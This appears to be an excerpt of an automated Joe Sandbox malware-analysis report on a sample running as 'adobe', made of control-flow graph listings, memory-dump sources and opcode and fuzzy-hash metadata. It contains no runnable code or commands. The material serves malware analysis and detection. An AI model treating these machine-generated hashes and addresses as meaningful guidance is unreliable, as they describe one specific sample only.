                      control_flow_graph 2159 6d2da47-6d2da67 2160 6d2da69-6d2da6c 2159->2160 2161 6d2da6e-6d2da9a 2160->2161 2162 6d2da9f-6d2daa2 2160->2162 2161->2162 2163 6d2dab1-6d2dab4 2162->2163 2164 6d2daa4 2162->2164 2165 6d2dab6-6d2dad2 2163->2165 2166 6d2dad7-6d2dad9 2163->2166 2167 6d2daaa-6d2daac 2164->2167 2165->2166 2168 6d2dae0-6d2dae3 2166->2168 2169 6d2dadb 2166->2169 2167->2163 2168->2160 2171 6d2dae5-6d2daf4 2168->2171 2169->2168 2174 6d2dafa-6d2db33 2171->2174 2175 6d2dc79-6d2dca3 2171->2175 2182 6d2db81-6d2dba5 2174->2182 2183 6d2db35-6d2db3f 2174->2183 2178 6d2dca4 2175->2178 2178->2178 2189 6d2dba7 2182->2189 2190 6d2dbaf-6d2dc73 2182->2190 2187 6d2db41-6d2db47 2183->2187 2188 6d2db57-6d2db7f 2183->2188 2191 6d2db4b-6d2db4d 2187->2191 2192 6d2db49 2187->2192 2188->2182 2188->2183 2189->2190 2190->2174 2190->2175 2191->2188 2192->2188
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: PHkq
                      • API String ID: 0-902561536
                      • Opcode ID: 4f1a9cef404b5377ad8977ed13eba6063e05c1b7e64bf1203ee20f5cbb5f224b
                      • Instruction ID: e32114a67ef5a58569d22d1173d33f5cf1b01c5fac6c2d42e16ec56a1613cc0f
                      • Opcode Fuzzy Hash: 4f1a9cef404b5377ad8977ed13eba6063e05c1b7e64bf1203ee20f5cbb5f224b
                      • Instruction Fuzzy Hash: 3041BF30E10216DFDF65DFA4C594A9EBBB6FF95344F208529E402EB244EB70E946CB80

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2198 6d221b5-6d221e3 2199 6d221e5-6d221e8 2198->2199 2200 6d221ea-6d22206 2199->2200 2201 6d2220b-6d2220d 2199->2201 2200->2201 2202 6d22214-6d22217 2201->2202 2203 6d2220f 2201->2203 2202->2199 2205 6d22219-6d2223f 2202->2205 2203->2202 2210 6d22246-6d22274 2205->2210 2215 6d22276-6d22280 2210->2215 2216 6d222eb-6d2230f 2210->2216 2219 6d22282-6d22288 2215->2219 2220 6d22298-6d222e9 2215->2220 2224 6d22311 2216->2224 2225 6d22319 2216->2225 2222 6d2228a 2219->2222 2223 6d2228c-6d2228e 2219->2223 2220->2215 2220->2216 2222->2220 2223->2220 2224->2225 2227 6d2231a 2225->2227 2227->2227
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: PHkq
                      • API String ID: 0-902561536
                      • Opcode ID: de10bacd8d1a5df6f5d716506bc536183156769cadaaa396ba61ceba8a574be1
                      • Instruction ID: 5db361906ab5f04252ef325ab6ad01da69205173254d0b2c68f104f3840436c5
                      • Opcode Fuzzy Hash: de10bacd8d1a5df6f5d716506bc536183156769cadaaa396ba61ceba8a574be1
                      • Instruction Fuzzy Hash: E3310331B002128FDB699B74D61426E7BE2BF89314F148528E402DB394EF35CE45CB91

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 2233 6d221c8-6d221e3 2234 6d221e5-6d221e8 2233->2234 2235 6d221ea-6d22206 2234->2235 2236 6d2220b-6d2220d 2234->2236 2235->2236 2237 6d22214-6d22217 2236->2237 2238 6d2220f 2236->2238 2237->2234 2240 6d22219-6d2223f 2237->2240 2238->2237 2245 6d22246-6d22274 2240->2245 2250 6d22276-6d22280 2245->2250 2251 6d222eb-6d2230f 2245->2251 2254 6d22282-6d22288 2250->2254 2255 6d22298-6d222e9 2250->2255 2259 6d22311 2251->2259 2260 6d22319 2251->2260 2257 6d2228a 2254->2257 2258 6d2228c-6d2228e 2254->2258 2255->2250 2255->2251 2257->2255 2258->2255 2259->2260 2262 6d2231a 2260->2262 2262->2262
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: PHkq
                      • API String ID: 0-902561536
                      • Opcode ID: 398558a836b4afc4baa65911c607d319fe0c251b37565fa8905c6425e5699a22
                      • Instruction ID: 30c572819555fc1b0c158f55c78c88299d6a8c53816164c7163bf672b4fb81a5
                      • Opcode Fuzzy Hash: 398558a836b4afc4baa65911c607d319fe0c251b37565fa8905c6425e5699a22
                      • Instruction Fuzzy Hash: 9331CF30B002128FDB699B74D55466E7BE6BF89314F208428E406DB394EF36DE45CB91
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: |
                      • API String ID: 0-2343686810
                      • Opcode ID: 002b41a36909ce998b5532a17d1724033c4cb2ad28a619507ebb4ccd18d14c05
                      • Instruction ID: a3ce706e5b97c0b8406f752d9d294800fdd388866439fc5c9e4df25b035cf52c
                      • Opcode Fuzzy Hash: 002b41a36909ce998b5532a17d1724033c4cb2ad28a619507ebb4ccd18d14c05
                      • Instruction Fuzzy Hash: 52114675F102218FDB54AF789905BAE7BF1AB88610F10846AE90AE73A4DB359900CB90
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID: |
                      • API String ID: 0-2343686810
                      • Opcode ID: 7b8e6a9ccca9c9bc1ec2bca70a7a121ecd414c9a754bc19e32afa24fe08754b3
                      • Instruction ID: 95a45a16078109eab5d92db798cd69622e68827253f827c66d2813558d4d686b
                      • Opcode Fuzzy Hash: 7b8e6a9ccca9c9bc1ec2bca70a7a121ecd414c9a754bc19e32afa24fe08754b3
                      • Instruction Fuzzy Hash: 3B115B71F502259FDB449F788804BAEBBF5AF88710F10846AE54AE73A0DB359D00CB90
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 16f8a573342f1fb3b0b208ae671d4d3a6a160bbf7bac732149f70587fb06c017
                      • Instruction ID: ae0ccb77ab05437cf23d606f31a5906c84366f3157ac9843974b6f7b4ec69bb5
                      • Opcode Fuzzy Hash: 16f8a573342f1fb3b0b208ae671d4d3a6a160bbf7bac732149f70587fb06c017
                      • Instruction Fuzzy Hash: A5A1F770F0021A8FDF64DB98D5807AEB7B6FF99318F604826E405EB395CA79DC818751
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0251c313796bfde51ed23f75d065efa3b01486f1d2c55a7d3cdd93351984733f
                      • Instruction ID: e23eed5a9a95d5639088072af9fa0ed95d89f6ce2ab288e6ac0b596b0183056e
                      • Opcode Fuzzy Hash: 0251c313796bfde51ed23f75d065efa3b01486f1d2c55a7d3cdd93351984733f
                      • Instruction Fuzzy Hash: 7561F5B1F002224FCF559B7DC88066EBADBAFD4624B144439E80ADB379DE65EC4287C1
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0cc5156b6c4cdeeabf49e905a5ebf678259419d9f84b33d4b3c2c4525dafd2e7
                      • Instruction ID: a7665132155d82f3fdc6ef6f86d520e3bd86974ef4220b4912eaf2a276bfc534
                      • Opcode Fuzzy Hash: 0cc5156b6c4cdeeabf49e905a5ebf678259419d9f84b33d4b3c2c4525dafd2e7
                      • Instruction Fuzzy Hash: B0813930B1021A8FCF54DFA9D5546AEB7F6EF95304F508429D80ADB398EB74DC468B90
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 22de67322bb7b81eefd2f4cdcbd7b44a0fb22518181f0240c23ea2ed16fde5a6
                      • Instruction ID: 6d973250711d6bfdbfb494d7cbc9837fd5948351c11fade8c4c26e45d2d798a7
                      • Opcode Fuzzy Hash: 22de67322bb7b81eefd2f4cdcbd7b44a0fb22518181f0240c23ea2ed16fde5a6
                      • Instruction Fuzzy Hash: 6C813830B1021A8FDF54DFA9D55466EB7F6AF99304F108429D80ADB398EF74DC428B91
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f32c75f42da4c28f72781d97fd5cf8c8bea65cbb0aeadb81cca31c09888d0d98
                      • Instruction ID: f94c7d90eae63eef6b8175c04be0955a5acaccd8f4ee6f92cf1642e6a6470418
                      • Opcode Fuzzy Hash: f32c75f42da4c28f72781d97fd5cf8c8bea65cbb0aeadb81cca31c09888d0d98
                      • Instruction Fuzzy Hash: C7915E30E1021A8FDF60DF68C890B9DB7B1FF99304F208599D559AB395DB70AA85CF90
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d38354259bd3ada725ce04c7788c7a0fdb63292017ad14109f64fe4f8a054348
                      • Instruction ID: 2c5ebf5270a23ff9bf09964eca4d3e6eb7cf8838b4aed02db81857e09457d440
                      • Opcode Fuzzy Hash: d38354259bd3ada725ce04c7788c7a0fdb63292017ad14109f64fe4f8a054348
                      • Instruction Fuzzy Hash: 5D916D30E1021A8FDF60DF68C880B9DB7B1FF99304F208599D559AB395DB70AA85CF90
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 265dcf8da62ede9bbcf3136b625e6f3c57d7e33c9f6db184a3fb81aa26f3f7c1
                      • Instruction ID: 29ff7014fba391be90513b8cbc4856a607fd11131ec01e6e08ce803cd6281ca5
                      • Opcode Fuzzy Hash: 265dcf8da62ede9bbcf3136b625e6f3c57d7e33c9f6db184a3fb81aa26f3f7c1
                      • Instruction Fuzzy Hash: B1714C70B0021A9FDB55DBA9D980A9EBBF6FF98304F148829D405EB355DB30EC46CB50
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 73ce610ccf2f2c151a26a6b2c8fdedbec9858edc814b589822e6287151edd69f
                      • Instruction ID: 6bb3ee295a25b10b109e7f3c827bffddce3bff5906aecfffd5baca8f0f5adf59
                      • Opcode Fuzzy Hash: 73ce610ccf2f2c151a26a6b2c8fdedbec9858edc814b589822e6287151edd69f
                      • Instruction Fuzzy Hash: 48712B70B0021A9FDB55DBA9D980A9EBBF6FF98304F148829D405EB355DB31EC46CB50
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 55200107e731bffe81b996db1a57d6ee471f546d92d48343e76ad2479e233552
                      • Instruction ID: fc6154f1f678d77953a04b51b2c087e53d5c45de2be17dc934d3302e6f3070bf
                      • Opcode Fuzzy Hash: 55200107e731bffe81b996db1a57d6ee471f546d92d48343e76ad2479e233552
                      • Instruction Fuzzy Hash: 7D51CF31E40116DFCF64ABB8E4946ADBBB2FF94319F208C69D11AE7350DB359845CB80
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c6d676988bc224aaeb7204be62fa81c65495a931290412ecc8fa8b58de7a8712
                      • Instruction ID: 98e4ffe9d4386c0a06deaedd4d6072d847ed6a234f9c1889f7e188848f203ac0
                      • Opcode Fuzzy Hash: c6d676988bc224aaeb7204be62fa81c65495a931290412ecc8fa8b58de7a8712
                      • Instruction Fuzzy Hash: D451F670B602259FEF645BACD954B2F2A6ED7D9314F204C2EE00AD73E4CD29CC8547A2
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a8600f869a28c1bf3e1894cdb02a261187db17a33ef7e629e7820682f6a3b81c
                      • Instruction ID: b5e873be7260fe6663199c5b5966f5bb7746e6a227788dc5e838892a17efcbab
                      • Opcode Fuzzy Hash: a8600f869a28c1bf3e1894cdb02a261187db17a33ef7e629e7820682f6a3b81c
                      • Instruction Fuzzy Hash: DB51C670B602259FEF645BACD958B2F266ED7DD714F204C2AE00AD73E4CD29CC8547A2
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e50d0307746e0065250d7b0c68b0421b373dda733b62fad8884b160f0abfb2a7
                      • Instruction ID: 54f248268fc025167c9d397fa37bd4c41d414d35b9f99032a04bf77d8e233c4c
                      • Opcode Fuzzy Hash: e50d0307746e0065250d7b0c68b0421b373dda733b62fad8884b160f0abfb2a7
                      • Instruction Fuzzy Hash: 65413D71E0061A9FDF70CF99E880AAFFBB2FB98314F10492AD156D7650D331E8568B90
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6c619e1fc8929adceb29f37221ea9878d4c63e91fa37ca167146bd1b81a0e9d3
                      • Instruction ID: ebb52a53adcf6bea4da16bd2d7472596a5e3fa74fb02c39d0793107696dc3f1d
                      • Opcode Fuzzy Hash: 6c619e1fc8929adceb29f37221ea9878d4c63e91fa37ca167146bd1b81a0e9d3
                      • Instruction Fuzzy Hash: 5931F631F101228FDFA857BCD89475E72A6EBD8215F204C3AD40ED7394DA35CC428791
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4333fee0c90d4d32f76614ad0157d5e06cb94e5ff101be534799af8574920efb
                      • Instruction ID: 380841143ec77dc1472d045c29c60f20cbfafba10799b79e070cd49dbd8a66d0
                      • Opcode Fuzzy Hash: 4333fee0c90d4d32f76614ad0157d5e06cb94e5ff101be534799af8574920efb
                      • Instruction Fuzzy Hash: 52317270E102169BCB19CF68D994A9EB7B2FF89300F108929F805E7354DB71ED86CB50
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a467a502fa02675421f7a662b8c65dc304d1e6248bc5f0bc67594d9de50deed5
                      • Instruction ID: c24e059967e7d774ea239cca807a8f318fa41bd1e8771172dc68b33f736a2f7f
                      • Opcode Fuzzy Hash: a467a502fa02675421f7a662b8c65dc304d1e6248bc5f0bc67594d9de50deed5
                      • Instruction Fuzzy Hash: 3B317270E102169BCB19CFA8D994A9EB7B2FF89300F10C929E805E7354DB71ED86CB50
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1bf13ac723b7a52917f03496e55999e509c9ed245d86e75b82bfda053bb6cddc
                      • Instruction ID: 8bf02ee3c63349a713226644e0c5ee554f1437049df4d95875180a5dc6eb3b29
                      • Opcode Fuzzy Hash: 1bf13ac723b7a52917f03496e55999e509c9ed245d86e75b82bfda053bb6cddc
                      • Instruction Fuzzy Hash: D7216D72F112169FDB40DF69E941AAEB7F1FB48310F10806AE915E7350EB34DD458B90
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9f45bc77a42ebf78d3169b94aaef319f8a390a6aba1c6630bbc05984f6fe9954
                      • Instruction ID: 958cf1b7a986887430b6e3362d43dcfc872ec43fc6632c513846e61ff197d272
                      • Opcode Fuzzy Hash: 9f45bc77a42ebf78d3169b94aaef319f8a390a6aba1c6630bbc05984f6fe9954
                      • Instruction Fuzzy Hash: 6A217A76F012169FDB40DF69E980AAEB7F1FB48310F11802AE916E7350EB38DC448B90
                      Memory Dump Source
                      • Source File: 00000003.00000002.1971675807.000000000151D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0151D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_151d000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 58acd1a66e9aede92206384511c46040792e3680e044a19d7bc07399be218b31
                      • Instruction ID: ce9b10aa63026c3f30150100523d83e7ca988cc7a09d69295c17f60ccf8cefdd
                      • Opcode Fuzzy Hash: 58acd1a66e9aede92206384511c46040792e3680e044a19d7bc07399be218b31
                      • Instruction Fuzzy Hash: 5B213475504200DFEB12DF58D9C8B2ABBB5FB84314F20CA6DD8094F25AD33AD847CA62
                      Memory Dump Source
                      • Source File: 00000003.00000002.1971675807.000000000151D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0151D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_151d000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 87f8b5d8b3e95719989e1d3f6a44657f5183497a0e8ac6ea970d7b52e3181618
                      • Instruction ID: 3ab929fd5da7274934b8bee762675b7df6e660a4a2ae1f95b6d5e64b899e856b
                      • Opcode Fuzzy Hash: 87f8b5d8b3e95719989e1d3f6a44657f5183497a0e8ac6ea970d7b52e3181618
                      • Instruction Fuzzy Hash: 51217C750093C09FDB03CB64C994B15BF71AB46214F29C5DBD8888F2A7C23A980ACB62
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0bc610b8ba4dc47000641616f4ccff99368e2fd248623c204fec219d6de44e17
                      • Instruction ID: 21ab8d15d6000038387645bddde661be4e6fadede5d2b9862a0d8f1e3a482d9f
                      • Opcode Fuzzy Hash: 0bc610b8ba4dc47000641616f4ccff99368e2fd248623c204fec219d6de44e17
                      • Instruction Fuzzy Hash: 0A118E32B101258FDF549A68E8186AF73FAEBD8711B11453AD406E7358EE79DC028BE1
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f31f9b8aa6c7fac0e6616ad6ca53796936fbf4849fa4af009144554f032ac35d
                      • Instruction ID: 19cc46cfbcbeb328917c6146c4dd3146f1cc620b5bdf8e54b3ccc39f6d5b1dd2
                      • Opcode Fuzzy Hash: f31f9b8aa6c7fac0e6616ad6ca53796936fbf4849fa4af009144554f032ac35d
                      • Instruction Fuzzy Hash: 3D014731B100210FCB6086BED81172BB6CAEBC4750F10C43AF90AC7340ED22DC434390
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a270088d6c15230f6174adbed6f9f952e3f1d14c8b9f45c23445da1bcffed257
                      • Instruction ID: 15fa1a405059853d9822e6dd02b19701897aec5eab50629ccb4c4fe932d16e50
                      • Opcode Fuzzy Hash: a270088d6c15230f6174adbed6f9f952e3f1d14c8b9f45c23445da1bcffed257
                      • Instruction Fuzzy Hash: 1021C4B5D01229AFCB00DF9AD984ACEFBB4FB48324F10812AE518A7340D374A554CFA5
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: aa9274fe627158ff17fd2edfc814d4443f08c9128622c490ee8a4417eaa9221a
                      • Instruction ID: 02c150476256ea917955da4dd2b43fb1d71f1243fcc38b2e0fc9f346686eb876
                      • Opcode Fuzzy Hash: aa9274fe627158ff17fd2edfc814d4443f08c9128622c490ee8a4417eaa9221a
                      • Instruction Fuzzy Hash: FC018432B100264BDF549669EC187AF73BBDBC4610F054536D506E7348FE64DC0247D1
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b051fc8355c9da2531f542d410cdf431a2cabee3a55fa4a9923996d5b6bf6ba9
                      • Instruction ID: 9a14ac943d885b63bce33a19c4af3cbb482fc51c46cc1a9c3f772addafbbc673
                      • Opcode Fuzzy Hash: b051fc8355c9da2531f542d410cdf431a2cabee3a55fa4a9923996d5b6bf6ba9
                      • Instruction Fuzzy Hash: BB11B3B5D01269AFCB00DF9AD984ADEFBB4FB48324F10812AE518A7340D374A554CFA5
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 82f600228ee28eccd5b1967e3a9c5750e66a64ef69af701cb619303bab10b103
                      • Instruction ID: 1f9ceaaf69c1897638c40b71744b674f288c0b051c2a47bf171e70aed771565d
                      • Opcode Fuzzy Hash: 82f600228ee28eccd5b1967e3a9c5750e66a64ef69af701cb619303bab10b103
                      • Instruction Fuzzy Hash: 0701A271B101224FDB60EABDD85572BB3D5EB85B14F54C839E50AC7340EE2AEC028380
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: acf411083a79a8f265b59c302130bb5d844160aee4ebf0c316dec4c02e3c4e1e
                      • Instruction ID: 604c9691d20f23b245d3203860e8e73c19286a4a3cfd9da2928aca196c687153
                      • Opcode Fuzzy Hash: acf411083a79a8f265b59c302130bb5d844160aee4ebf0c316dec4c02e3c4e1e
                      • Instruction Fuzzy Hash: A601D631B100210BDB659ABED55072BB6DAEBD9714F10C83AE90AC7344ED26DC424391
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f66d034c08f316b15a298d542e5186f0bc7815afbe6bb58c42efd86a6a25410b
                      • Instruction ID: 2043e57194e506085c7f04b04d6cd72d0fa148561d97d174e50f947ecb80d825
                      • Opcode Fuzzy Hash: f66d034c08f316b15a298d542e5186f0bc7815afbe6bb58c42efd86a6a25410b
                      • Instruction Fuzzy Hash: 710181B2B100224BDB669B7CD95572E63E6EBC9624F508C3AE10EC7354EE66DC434391
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1c45fb2198ef68cc94a649b1fe353d9a398c6bb2d0b7e5dbe5c92c0eb9d1223a
                      • Instruction ID: a2542460746e6da2cb9c30d9d149165febe3fd3ca5b4f7d1b8088b027619342c
                      • Opcode Fuzzy Hash: 1c45fb2198ef68cc94a649b1fe353d9a398c6bb2d0b7e5dbe5c92c0eb9d1223a
                      • Instruction Fuzzy Hash: 8801A471B100220BDB669B7CD85472E77E6E7C9664F508C3AE10EC7354EE66DC434391
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5f19599a7c1e272e866a4143fa9398e9cf500c317609465a0ed7ca8e00c49bb8
                      • Instruction ID: 99b1810563a73cdcd3c4ec345d936ad9acd6af55b15c855735bf710f98db0deb
                      • Opcode Fuzzy Hash: 5f19599a7c1e272e866a4143fa9398e9cf500c317609465a0ed7ca8e00c49bb8
                      • Instruction Fuzzy Hash: 58018170B100264FDB65DBBDE45472AB3D6EB89B24F548839E50AC7350EE26EC428780
                      Memory Dump Source
                      • Source File: 00000003.00000002.1978087482.0000000006D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D20000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_6d20000_adobe.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
